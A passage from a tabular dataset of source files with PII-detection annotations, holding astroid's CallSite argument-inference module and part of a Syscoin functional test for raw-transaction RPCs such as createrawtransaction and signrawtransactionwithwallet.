['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'haproxy.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ma'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.sy'], ['URL', 'haproxy.re'], ['URL', 'low.re'], ['URL', 'here.re'], ['URL', 'maintenance.ar'], ['URL', 'haproxy.as'], ['URL', 'mock.AN'], ['URL', 'low.ca'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'config.re'], ['URL', 'value.ge'], ['URL', 'registrations.re'], ['URL', 'service.ma'], ['URL', 'namespace.re'], ['URL', 'service.re'], ['URL', 'service.ma'], ['URL', 'services.re'], ['URL', 'service.ma'], ['URL', 'mock.Ma'], ['URL', 'maintenance.sy'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is'], ['URL', 'mock.pa'], ['URL', 'tools.pa'], ['URL', 'maintenance.ge'], ['URL', 'gethostbyname.re'], ['URL', 'service.ma'], ['URL', 'maintenance.is']]"
75,"# Copyright (c) 2015-2016, 2018-2020 Claudiu Popa dummy@email.com
# Copyright (c) 2015-2016 Ceridwen dummy@email.com
# Copyright (c) 2018 Bryce Guinta dummy@email.com
# Copyright (c) 2018 Nick Drozd dummy@email.com
# Copyright (c) 2018 Anthony Sottile dummy@email.com
# Copyright (c) 2020 hippo91 dummy@email.com
# Copyright (c) 2021 Pierre Sassoulas dummy@email.com
# Licensed under the LGPL: https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html
# For details: https://github.com/PyCQA/astroid/blob/master/LICENSE
from astroid import bases
from astroid import context as contextmod
from astroid import exceptions, nodes, util
class CallSite:
""""""Class for understanding arguments passed into a call site
It needs a call context, which contains the arguments and the
keyword arguments that were passed into a given call site.
In order to infer what an argument represents, call :meth:`infer_argument`
with the corresponding function node and the argument name.
:param callcontext:
An instance of :class:`astroid.context.CallContext`, that holds
the arguments for the call site.
:param argument_context_map:
Additional contexts per node, passed in from :attr:`astroid.context.Context.extra_context`
:param context:
An instance of :class:`astroid.context.Context`.
""""""
def __init__(self, callcontext, argument_context_map=None, context=None):
if argument_context_map is None:
argument_context_map = {}
self.argument_context_map = argument_context_map
args = callcontext.args
keywords = callcontext.keywords
self.duplicated_keywords = set()
self._unpacked_args = self._unpack_args(args, context=context)
self._unpacked_kwargs = self._unpack_keywords(keywords, context=context)
self.positional_arguments = [
arg for arg in self._unpacked_args if arg is not util.Uninferable
]
self.keyword_arguments = {
key: value
for key, value in self._unpacked_kwargs.items()
if value is not util.Uninferable
}
@classmethod
def from_call(cls, call_node, context=None):
""""""Get a CallSite object from the given Call node.
:param context:
An instance of :class:`astroid.context.Context` that will be used
to force a single inference path.
""""""
# Determine the callcontext from the given `context` object if any.
context = context or contextmod.InferenceContext()
callcontext = contextmod.CallContext(call_node.args, call_node.keywords)
return cls(callcontext, context=context)
def has_invalid_arguments(self):
""""""Check if in the current CallSite were passed *invalid* arguments
This can mean multiple things. For instance, if an unpacking
of an invalid object was passed, then this method will return True.
Other cases can be when the arguments can't be inferred by astroid,
for example, by passing objects which aren't known statically.
""""""
return len(self.positional_arguments) != len(self._unpacked_args)
def has_invalid_keywords(self):
""""""Check if in the current CallSite were passed *invalid* keyword arguments
For instance, unpacking a dictionary with integer keys is invalid
(**{1:2}), because the keys must be strings, which will make this
method to return True. Other cases where this might return True if
objects which can't be inferred were passed.
""""""
return len(self.keyword_arguments) != len(self._unpacked_kwargs)
def _unpack_keywords(self, keywords, context=None):
values = {}
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for name, value in keywords:
if name is None:
# Then it's an unpacking operation (**)
try:
inferred = next(value.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(inferred, nodes.Dict):
# Not something we can work with.
values[name] = util.Uninferable
continue
for dict_key, dict_value in inferred.items:
try:
dict_key = next(dict_key.infer(context=context))
except exceptions.InferenceError:
values[name] = util.Uninferable
continue
if not isinstance(dict_key, nodes.Const):
values[name] = util.Uninferable
continue
if not isinstance(dict_key.value, str):
values[name] = util.Uninferable
continue
if dict_key.value in values:
# The name is already in the dictionary
values[dict_key.value] = util.Uninferable
self.duplicated_keywords.add(dict_key.value)
continue
values[dict_key.value] = dict_value
else:
values[name] = value
return values
def _unpack_args(self, args, context=None):
values = []
context = context or contextmod.InferenceContext()
context.extra_context = self.argument_context_map
for arg in args:
if isinstance(arg, nodes.Starred):
try:
inferred = next(arg.value.infer(context=context))
except exceptions.InferenceError:
values.append(util.Uninferable)
continue
if inferred is util.Uninferable:
values.append(util.Uninferable)
continue
if not hasattr(inferred, ""elts""):
values.append(util.Uninferable)
continue
values.extend(inferred.elts)
else:
values.append(arg)
return values
def infer_argument(self, funcnode, name, context):
""""""infer a function argument value according to the call context
Arguments:
funcnode: The function being called.
name: The name of the argument whose value is being inferred.
context: Inference context object
""""""
if name in self.duplicated_keywords:
raise exceptions.InferenceError(
""The arguments passed to {func!r} "" "" have duplicate keywords."",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
# Look into the keywords first, maybe it's already there.
try:
return self.keyword_arguments[name].infer(context)
except KeyError:
pass
# Too many arguments given and no variable arguments.
if len(self.positional_arguments) > len(funcnode.args.args):
if not funcnode.args.vararg and not funcnode.args.posonlyargs:
raise exceptions.InferenceError(
""Too many positional arguments ""
""passed to {func!r} that does ""
""not have *args."",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
positional = self.positional_arguments[: len(funcnode.args.args)]
vararg = self.positional_arguments[len(funcnode.args.args) :]
argindex = funcnode.args.find_argname(name)[0]
kwonlyargs = {arg.name for arg in funcnode.args.kwonlyargs}
kwargs = {
key: value
for key, value in self.keyword_arguments.items()
if key not in kwonlyargs
}
# If there are too few positionals compared to
# what the function expects to receive, check to see
# if the missing positional arguments were passed
# as keyword arguments and if so, place them into the
# positional args list.
if len(positional) < len(funcnode.args.args):
for func_arg in funcnode.args.args:
if func_arg.name in kwargs:
arg = kwargs.pop(func_arg.name)
positional.append(arg)
if argindex is not None:
# 2. first argument of instance/class method
if argindex == 0 and funcnode.type in (""method"", ""classmethod""):
if context.boundnode is not None:
boundnode = context.boundnode
else:
# XXX can do better ?
boundnode = funcnode.parent.frame()
if isinstance(boundnode, nodes.ClassDef):
# Verify that we're accessing a method
# of the metaclass through a class, as in
# `cls.metaclass_method`. In this case, the
# first argument is always the class.
method_scope = funcnode.parent.scope()
if method_scope is boundnode.metaclass():
return iter((boundnode,))
if funcnode.type == ""method"":
if not isinstance(boundnode, bases.Instance):
boundnode = boundnode.instantiate_class()
return iter((boundnode,))
if funcnode.type == ""classmethod"":
return iter((boundnode,))
# if we have a method, extract one position
# from the index, so we'll take in account
# the extra parameter represented by `self` or `cls`
if funcnode.type in (""method"", ""classmethod""):
argindex -= 1
# 2. search arg index
try:
return self.positional_arguments[argindex].infer(context)
except IndexError:
pass
if funcnode.args.kwarg == name:
# It wants all the keywords that were passed into
# the call site.
if self.has_invalid_keywords():
raise exceptions.InferenceError(
""Inference failed to find values for all keyword arguments ""
""to {func!r}: {unpacked_kwargs!r} doesn't correspond to ""
""{keyword_arguments!r}."",
keyword_arguments=self.keyword_arguments,
unpacked_kwargs=self._unpacked_kwargs,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
kwarg = nodes.Dict(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
kwarg.postinit(
[(nodes.const_factory(key), value) for key, value in kwargs.items()]
)
return iter((kwarg,))
if funcnode.args.vararg == name:
# It wants all the args that were passed into
# the call site.
if self.has_invalid_arguments():
raise exceptions.InferenceError(
""Inference failed to find values for all positional ""
""arguments to {func!r}: {unpacked_args!r} doesn't ""
""correspond to {positional_arguments!r}."",
positional_arguments=self.positional_arguments,
unpacked_args=self._unpacked_args,
call_site=self,
func=funcnode,
arg=name,
context=context,
)
args = nodes.Tuple(
lineno=funcnode.args.lineno,
col_offset=funcnode.args.col_offset,
parent=funcnode.args,
)
args.postinit(vararg)
return iter((args,))
# Check if it's a default parameter.
try:
return funcnode.args.default_value(name).infer(context)
except exceptions.NoDefault:
pass
raise exceptions.InferenceError(
""No value found for argument {arg} to {func!r}"",
call_site=self,
func=funcnode,
arg=name,
context=context,
)
",12599,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2015-2016'], ['DATE_TIME', '2018-2020'], ['PERSON', 'Claudiu Popa'], ['DATE_TIME', '2015-2016'], ['PERSON', 'Ceridwen'], ['PERSON', 'Nick Drozd'], ['PERSON', 'Anthony Sottile'], ['DATE_TIME', '2020'], ['PERSON', 'hippo91'], ['DATE_TIME', '2021'], ['PERSON', 'Pierre Sassoulas'], ['PERSON', 'callcontext = contextmod'], ['PERSON', 'kwonlyargs'], ['PERSON', 'boundnode'], ['PERSON', 'boundnode'], ['PERSON', 'lineno=funcnode.args.lineno'], ['PERSON', 'lineno=funcnode.args.lineno'], ['URL', 'https://www.gnu.org/licenses/old-licenses/lgpl-2.1.en.html'], ['URL', 'https://github.com/PyCQA/astroid/blob/master/LICENSE'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'email.com'], ['URL', 'astroid.context.Ca'], ['URL', 'astroid.context.Co'], ['URL', 'astroid.context.Co'], ['URL', 'self.ar'], ['URL', 'callcontext.ar'], ['URL', 'callcontext.ke'], ['URL', 'self.ke'], ['URL', 'kwargs.it'], ['URL', 'astroid.context.Co'], ['URL', 'contextmod.In'], ['URL', 'contextmod.Ca'], ['URL', 'node.ar'], ['URL', 'node.ke'], ['URL', 'self.ke'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'value.in'], ['URL', 'exceptions.In'], ['URL', 'inferred.it'], ['URL', 'key.in'], ['URL', 'exceptions.In'], ['URL', 'nodes.Co'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'keywords.ad'], ['URL', 'key.va'], ['URL', 'key.va'], ['URL', 'contextmod.In'], ['URL', 'self.ar'], ['URL', 'nodes.St'], ['URL', 'arg.value.in'], ['URL', 'exceptions.In'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.va'], ['URL', 'funcnode.ar'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.fi'], ['URL', 'arg.na'], ['URL', 'funcnode.args.kw'], ['URL', 'self.ke'], ['URL', 'arguments.it'], ['URL', 'funcnode.args.ar'], ['URL', 'funcnode.args.ar'], ['URL', 'arg.na'], ['URL', 'arg.na'], ['URL', 'context.bo'], ['URL', 'context.bo'], ['URL', 'funcnode.parent.fr'], ['URL', 'nodes.Cl'], ['URL', 'cls.me'], ['URL', 'funcnode.parent.sc'], ['URL', 'boundnode.me'], ['URL', 'bases.In'], ['URL', 'boundnode.in'], ['URL', 'funcnode.args.kw'], ['URL', 'exceptions.In'], ['URL', 'self.ke'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'nodes.co'], ['URL', 'kwargs.it'], ['URL', 'funcnode.args.va'], ['URL', 'exceptions.In'], ['URL', 'funcnode.args.li'], ['URL', 'funcnode.args.co'], ['URL', 'funcnode.ar'], ['URL', 'funcnode.args.de'], ['URL', 'exceptions.No'], ['URL', 'exceptions.In']]"
76,"#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
""""""Test the rawtransaction RPCs.
Test the following RPCs:
- createrawtransaction
- signrawtransactionwithwallet
- sendrawtransaction
- decoderawtransaction
- getrawtransaction
""""""
from collections import OrderedDict
from decimal import Decimal
from io import BytesIO
from test_framework.messages import CTransaction, ToHex
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import (
assert_equal,
assert_raises_rpc_error,
find_vout_for_address,
hex_str_to_bytes,
)
class multidict(dict):
""""""Dictionary that allows duplicate keys.
Constructed with a list of (key, value) tuples. When dumped by the json module,
will output invalid json with repeated keys, eg:
>>> json.dumps(multidict([(1,2),(1,2)])
'{""1"": 2, ""1"": 2}'
Used to test calls to rpc methods with repeated keys in the json object.""""""
def __init__(self, x):
dict.__init__(self, x)
self.x = x
def items(self):
return self.x
# Create one-input, one-output, no-fee transaction:
class RawTransactionsTest(SyscoinTestFramework):
def set_test_params(self):
self.setup_clean_chain = True
self.num_nodes = 3
self.extra_args = [
[""-txindex""],
[""-txindex""],
[""-txindex""],
]
self.supports_cli = False
def skip_test_if_missing_module(self):
self.skip_if_no_wallet()
def setup_network(self):
super().setup_network()
self.connect_nodes(0, 2)
def run_test(self):
self.log.info('prepare some coins for multiple *rawtransaction commands')
self.nodes[2].generate(1)
self.sync_all()
self.nodes[0].generate(101)
self.sync_all()
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.5)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),1.0)
self.nodes[0].sendtoaddress(self.nodes[2].getnewaddress(),5.0)
self.sync_all()
self.nodes[0].generate(5)
self.sync_all()
self.log.info('Test getrawtransaction on genesis block coinbase returns an error')
block = self.nodes[0].getblock(self.nodes[0].getblockhash(0))
assert_raises_rpc_error(-5, ""The genesis block coinbase is not considered an ordinary transaction"", self.nodes[0].getrawtransaction, block['merkleroot'])
self.log.info('Check parameter types and required parameters of createrawtransaction')
# Test `createrawtransaction` required parameters
assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction)
assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, [])
# Test `createrawtransaction` invalid extra parameters
assert_raises_rpc_error(-1, ""createrawtransaction"", self.nodes[0].createrawtransaction, [], {}, 0, False, 'foo')
# Test `createrawtransaction` invalid `inputs`
txid = 'PI:KEY'
assert_raises_rpc_error(-3, ""Expected type array"", self.nodes[0].createrawtransaction, 'foo', {})
assert_raises_rpc_error(-1, ""JSON value is not an object as expected"", self.nodes[0].createrawtransaction, ['foo'], {})
assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].createrawtransaction, [{}], {})
assert_raises_rpc_error(-8, ""txid must be of length 64 (not 3, for 'foo')"", self.nodes[0].createrawtransaction, [{'txid': 'foo'}], {})
assert_raises_rpc_error(-8, ""txid must be hexadecimal string (not 'PI:KEY')"", self.nodes[0].createrawtransaction, [{'txid': 'PI:KEY'}], {})
assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{'txid': txid}], {})
assert_raises_rpc_error(-8, ""Invalid parameter, missing vout key"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 'foo'}], {})
assert_raises_rpc_error(-8, ""Invalid parameter, vout cannot be negative"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': -1}], {})
assert_raises_rpc_error(-8, ""Invalid parameter, sequence number is out of range"", self.nodes[0].createrawtransaction, [{'txid': txid, 'vout': 0, 'sequence': -1}], {})
# Test `createrawtransaction` invalid `outputs`
address = self.nodes[0].getnewaddress()
address2 = self.nodes[0].getnewaddress()
assert_raises_rpc_error(-1, ""JSON value is not an array as expected"", self.nodes[0].createrawtransaction, [], 'foo')
self.nodes[0].createrawtransaction(inputs=[], outputs={}) # Should not throw for backwards compatibility
self.nodes[0].createrawtransaction(inputs=[], outputs=[])
assert_raises_rpc_error(-8, ""Data must be hexadecimal string"", self.nodes[0].createrawtransaction, [], {'data': 'foo'})
assert_raises_rpc_error(-5, ""Invalid Syscoin address"", self.nodes[0].createrawtransaction, [], {'foo': 0})
assert_raises_rpc_error(-3, ""Invalid amount"", self.nodes[0].createrawtransaction, [], {address: 'foo'})
assert_raises_rpc_error(-3, ""Amount out of range"", self.nodes[0].createrawtransaction, [], {address: -1})
assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], multidict([(address, 1), (address, 1)]))
assert_raises_rpc_error(-8, ""Invalid parameter, duplicated address: %s"" % address, self.nodes[0].createrawtransaction, [], [{address: 1}, {address: 1}])
assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], [{""data"": 'aa'}, {""data"": ""bb""}])
assert_raises_rpc_error(-8, ""Invalid parameter, duplicate key: data"", self.nodes[0].createrawtransaction, [], multidict([(""data"", 'aa'), (""data"", ""bb"")]))
assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair must contain exactly one key"", self.nodes[0].createrawtransaction, [], [{'a': 1, 'b': 2}])
assert_raises_rpc_error(-8, ""Invalid parameter, key-value pair not an object as expected"", self.nodes[0].createrawtransaction, [], [['key-value pair1'], ['2']])
# Test `createrawtransaction` invalid `locktime`
assert_raises_rpc_error(-3, ""Expected type number"", self.nodes[0].createrawtransaction, [], {}, 'foo')
assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, -1)
assert_raises_rpc_error(-8, ""Invalid parameter, locktime out of range"", self.nodes[0].createrawtransaction, [], {}, 4294967296)
# Test `createrawtransaction` invalid `replaceable`
assert_raises_rpc_error(-3, ""Expected type bool"", self.nodes[0].createrawtransaction, [], {}, 0, 'foo')
self.log.info('Check that createrawtransaction accepts an array and object as outputs')
tx = CTransaction()
# One output
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs={address: 99}))))
assert_equal(len(tx.vout), 1)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}]),
)
# Two outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=OrderedDict([(address, 99), (address2, 99)])))))
assert_equal(len(tx.vout), 2)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}]),
)
# Multiple mixed outputs
tx.deserialize(BytesIO(hex_str_to_bytes(self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=multidict([(address, 99), (address2, 99), ('data', '99')])))))
assert_equal(len(tx.vout), 3)
assert_equal(
tx.serialize().hex(),
self.nodes[2].createrawtransaction(inputs=[{'txid': txid, 'vout': 9}], outputs=[{address: 99}, {address2: 99}, {'data': '99'}]),
)
for type in [""bech32"", ""p2sh-segwit"", ""legacy""]:
addr = self.nodes[0].getnewaddress("""", type)
addrinfo = self.nodes[0].getaddressinfo(addr)
pubkey = addrinfo[""scriptPubKey""]
self.log.info('sendrawtransaction with missing prevtx info (%s)' %(type))
# Test `signrawtransactionwithwallet` invalid `prevtxs`
inputs = [ {'txid' : txid, 'vout' : 3, 'sequence' : 1000}]
outputs = { self.nodes[0].getnewaddress() : 1 }
rawtx = self.nodes[0].createrawtransaction(inputs, outputs)
prevtx = dict(txid=txid, scriptPubKey=pubkey, vout=3, amount=1)
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ[""complete""]
if type == ""legacy"":
del prevtx[""amount""]
succ = self.nodes[0].signrawtransactionwithwallet(rawtx, [prevtx])
assert succ[""complete""]
if type != ""legacy"":
assert_raises_rpc_error(-3, ""Missing amount"", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
""txid"": txid,
""scriptPubKey"": pubkey,
""vout"": 3,
}
])
assert_raises_rpc_error(-3, ""Missing vout"", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
""txid"": txid,
""scriptPubKey"": pubkey,
""amount"": 1,
}
])
assert_raises_rpc_error(-3, ""Missing txid"", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
""scriptPubKey"": pubkey,
""vout"": 3,
""amount"": 1,
}
])
assert_raises_rpc_error(-3, ""Missing scriptPubKey"", self.nodes[0].signrawtransactionwithwallet, rawtx, [
{
""txid"": txid,
""vout"": 3,
""amount"": 1
}
])
#########################################
# sendrawtransaction with missing input #
#########################################
self.log.info('sendrawtransaction with missing input')
inputs = [ {'txid' : ""PI:KEY"", 'vout' : 1}] #won't exists
outputs = { self.nodes[0].getnewaddress() : 4.998 }
rawtx = self.nodes[2].createrawtransaction(inputs, outputs)
rawtx = self.nodes[2].signrawtransactionwithwallet(rawtx)
# This will raise an exception since there are missing inputs
assert_raises_rpc_error(-25, ""bad-txns-inputs-missingorspent"", self.nodes[2].sendrawtransaction, rawtx['hex'])
#####################################
# getrawtransaction with block hash #
#####################################
# make a tx by sending then generate 2 blocks; block1 has the tx in it
tx = self.nodes[2].sendtoaddress(self.nodes[1].getnewaddress(), 1)
block1, block2 = self.nodes[2].generate(2)
self.sync_all()
# We should be able to get the raw transaction by providing the correct block
gottx = self.nodes[0].getrawtransaction(tx, True, block1)
assert_equal(gottx['txid'], tx)
assert_equal(gottx['in_active_chain'], True)
# We should have the 'in_active_chain' flag when we don't provide a block due to blockindexdb
gottx = self.nodes[0].getrawtransaction(tx, True)
assert_equal(gottx['txid'], tx)
# SYSCOIN
assert 'in_active_chain' in gottx
# We should not get the tx if we provide an unrelated block
assert_raises_rpc_error(-5, ""No such transaction found"", self.nodes[0].getrawtransaction, tx, True, block2)
# An invalid block hash should raise the correct errors
assert_raises_rpc_error(-1, ""JSON value is not a string as expected"", self.nodes[0].getrawtransaction, tx, True, True)
assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 6, for 'foobar')"", self.nodes[0].getrawtransaction, tx, True, ""foobar"")
assert_raises_rpc_error(-8, ""parameter 3 must be of length 64 (not 8, for 'abcd1234')"", self.nodes[0].getrawtransaction, tx, True, ""abcd1234"")
assert_raises_rpc_error(-8, ""parameter 3 must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')"", self.nodes[0].getrawtransaction, tx, True, ""ZZZ0000000000000000000000000000000000000000000000000000000000000"")
assert_raises_rpc_error(-5, ""Block hash not found"", self.nodes[0].getrawtransaction, tx, True, ""0000000000000000000000000000000000000000000000000000000000000000"")
# Undo the blocks and check in_active_chain
self.nodes[0].invalidateblock(block1)
gottx = self.nodes[0].getrawtransaction(txid=tx, verbose=True, blockhash=block1)
assert_equal(gottx['in_active_chain'], False)
self.nodes[0].reconsiderblock(block1)
assert_equal(self.nodes[0].getbestblockhash(), block2)
if not self.options.descriptors:
# The traditional multisig workflow does not work with descriptor wallets so these are legacy only.
# The multisig workflow with descriptor wallets uses PSBTs and is tested elsewhere, no need to do them here.
#########################
# RAW TX MULTISIG TESTS #
#########################
# 2of2 test
addr1 = self.nodes[2].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[2].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
# Tests for createmultisig and addmultisigaddress
assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 1, [""01020304""])
self.nodes[0].createmultisig(2, [addr1Obj['pubkey'], addr2Obj['pubkey']]) # createmultisig can only take public keys
assert_raises_rpc_error(-5, ""Invalid public key"", self.nodes[0].createmultisig, 2, [addr1Obj['pubkey'], addr1]) # addmultisigaddress can take both pubkeys and addresses so long as they are in the wallet, which is tested here.
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr1])['address']
#use balance deltas instead of absolute values
bal = self.nodes[2].getbalance()
# send 1.2 SYS to msig adr
txId = self.nodes[0].sendtoaddress(mSigObj, 1.2)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal+Decimal('1.20000000')) #node2 has both keys of the 2of2 ms addr., tx should affect the balance
# 2of3 test from different nodes
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr3 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
addr3Obj = self.nodes[2].getaddressinfo(addr3)
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey'], addr3Obj['pubkey']])['address']
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
#THIS IS AN INCOMPLETE FEATURE
#NODE2 HAS TWO OF THREE KEY AND THE FUNDS SHOULD BE SPENDABLE AND COUNT AT BALANCE CALCULATION
assert_equal(self.nodes[2].getbalance(), bal) #for now, assume the funds of a 2of3 multisig tx are not marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ ""txid"" : txId, ""vout"" : vout['n'], ""scriptPubKey"" : vout['scriptPubKey']['hex'], ""amount"" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned = self.nodes[1].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxPartialSigned['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxSigned = self.nodes[2].signrawtransactionwithwallet(rawTx, inputs)
assert_equal(rawTxSigned['complete'], True) #node2 can sign the tx compl., own two of three keys
self.nodes[2].sendrawtransaction(rawTxSigned['hex'])
rawTx = self.nodes[0].decoderawtransaction(rawTxSigned['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# 2of2 test for combining transactions
bal = self.nodes[2].getbalance()
addr1 = self.nodes[1].getnewaddress()
addr2 = self.nodes[2].getnewaddress()
addr1Obj = self.nodes[1].getaddressinfo(addr1)
addr2Obj = self.nodes[2].getaddressinfo(addr2)
self.nodes[1].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObj = self.nodes[2].addmultisigaddress(2, [addr1Obj['pubkey'], addr2Obj['pubkey']])['address']
mSigObjValid = self.nodes[2].getaddressinfo(mSigObj)
txId = self.nodes[0].sendtoaddress(mSigObj, 2.2)
decTx = self.nodes[0].gettransaction(txId)
rawTx2 = self.nodes[0].decoderawtransaction(decTx['hex'])
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[2].getbalance(), bal) # the funds of a 2of2 multisig tx should not be marked as spendable
txDetails = self.nodes[0].gettransaction(txId, True)
rawTx2 = self.nodes[0].decoderawtransaction(txDetails['hex'])
vout = next(o for o in rawTx2['vout'] if o['value'] == Decimal('2.20000000'))
bal = self.nodes[0].getbalance()
inputs = [{ ""txid"" : txId, ""vout"" : vout['n'], ""scriptPubKey"" : vout['scriptPubKey']['hex'], ""redeemScript"" : mSigObjValid['hex'], ""amount"" : vout['value']}]
outputs = { self.nodes[0].getnewaddress() : 2.19 }
rawTx2 = self.nodes[2].createrawtransaction(inputs, outputs)
rawTxPartialSigned1 = self.nodes[1].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned1)
assert_equal(rawTxPartialSigned1['complete'], False) #node1 only has one key, can't comp. sign the tx
rawTxPartialSigned2 = self.nodes[2].signrawtransactionwithwallet(rawTx2, inputs)
self.log.debug(rawTxPartialSigned2)
assert_equal(rawTxPartialSigned2['complete'], False) #node2 only has one key, can't comp. sign the tx
rawTxComb = self.nodes[2].combinerawtransaction([rawTxPartialSigned1['hex'], rawTxPartialSigned2['hex']])
self.log.debug(rawTxComb)
self.nodes[2].sendrawtransaction(rawTxComb)
rawTx2 = self.nodes[0].decoderawtransaction(rawTxComb)
self.sync_all()
self.nodes[0].generate(1)
self.sync_all()
assert_equal(self.nodes[0].getbalance(), bal+Decimal('50.00000000')+Decimal('2.19000000')) #block reward + tx
# decoderawtransaction tests
# witness transaction
encrawtx = ""PI:KEY""
